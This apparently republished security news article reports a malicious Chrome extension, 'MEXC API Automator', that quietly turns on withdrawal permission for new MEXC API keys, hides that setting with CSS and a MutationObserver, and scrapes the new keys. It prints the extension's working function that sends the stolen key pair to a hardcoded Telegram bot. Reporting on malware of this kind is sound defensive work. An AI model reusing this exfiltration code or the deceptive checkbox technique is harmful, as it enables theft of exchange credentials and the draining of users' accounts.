Malicious Chrome Extension Steals Wallet Login Credentials and Enables Automated Trading

In Cybersecurity News. Original news source: cybersecuritynews.com, by Blog Writer.

A malicious Chrome extension called MEXC API Automator is abusing trust in browser add-ons to steal cryptocurrency trading access from MEXC users.

Posing as a tool that helps automate trading and API key creation, it quietly takes control of newly created API keys and turns an ordinary logged-in browser session into a full account takeover channel.

The attack starts from a legitimate-looking Chrome Web Store listing that promises “easy API key creation with trading and withdrawal access” for the MEXC exchange.

Once installed, the extension activates when the victim opens MEXC’s API management page, where users normally create keys for bots and automated trading.

From there, it can silently create keys that carry both trading and withdrawal permissions and hand them to the attacker, who can then trade and withdraw on the victim's behalf. Because the listing is public on the Chrome Web Store, the same trick works against MEXC users anywhere.

MEXC interface (Source – Socket.dev)

The screenshot above shows the MEXC interface exactly as targeted users see it during this process; nothing on the page looks out of the ordinary.

After reviewing the extension, Socket.dev researchers identified it as outright malware and linked it to a threat actor using the handle jorjortan142.

Their analysis showed that the code runs only inside an already logged-in MEXC session, so traditional password theft is not even needed: the victim's own authenticated session does the work.

The listing shows how Chrome Web Store branding is used to build trust: a published, reviewable extension reads as vetted software to most users.

Instead of stealing passwords, the extension focuses on MEXC API keys that allow both trading and withdrawals. These keys often live for a long time, are reused in bots and scripts, and are not watched as closely as interactive logins.

As soon as a fresh key appears in the success popup, the extension grabs it and prepares it for exfiltration to attacker-controlled Telegram infrastructure.

AI scanner detection (Source – Socket.dev)

This report now looks at how the extension hooks into the browser session, hides dangerous settings, and sends stolen data out in the background. The scanner screenshot shows Socket's AI Scanner flagging this behavior inside the extension code.

Infection Mechanism, UI Deception, and Telegram Exfiltration

MEXC API Automator is a Manifest V3 Chrome extension that injects a single content script, script.js, into pages matching the pattern *://*.mexc.com/user/openapi* (any scheme, any mexc.com subdomain, the API management path).

When the victim opens this page, the script waits for the DOM to load, finds the API creation form, and programmatically selects every permission checkbox, including withdrawals, without any extra clicks from the user.

To fool the victim, the script then tampers with the page styles so the withdrawal option looks unchecked even though the underlying checkbox stays checked and is submitted with the form.

It strips the “checked” class from the withdraw checkbox, hides the visual tick mark with injected CSS, and uses a MutationObserver to remove the class again if MEXC’s own code restores it.

The victim thinks only trading is allowed, but the submitted form actually carries full withdrawal rights.

When the exchange shows the success modal with the new Access Key and Secret Key, the script scrapes both values straight from the DOM and sends them to a hardcoded Telegram bot and chat ID in the background.

The core of this behavior appears in a simple function:

// Content script helper: exfiltrates the freshly created key pair to a
// hardcoded Telegram bot and chat ID through the public Bot API.
function sendKeysToTelegram(apiKey, secretKey) {
  const botToken = '7534112291:AAF46jJWWo95XsRWkzcPevHW7XNo6cqKG9I'; // attacker's bot token
  const chatId  = '6526634583';                                     // attacker's chat ID
  fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    // Both secrets leave in a single JSON message over a plain HTTPS POST
    body: JSON.stringify({ chat_id: chatId, text: `API Key: ${apiKey}\nSecret Key: ${secretKey}` })
  });
}

Since the extension stays inside the browser sandbox, reads only page content, and sends data over normal HTTPS, it blends into regular web traffic. The only network indicator is a POST to api.telegram.org originating from the browser, which few personal or enterprise setups alert on.

By the time a victim notices strange trades or missing funds, the attacker has already loaded the keys into scripts or tools that can drain accounts without ever touching the user’s password.
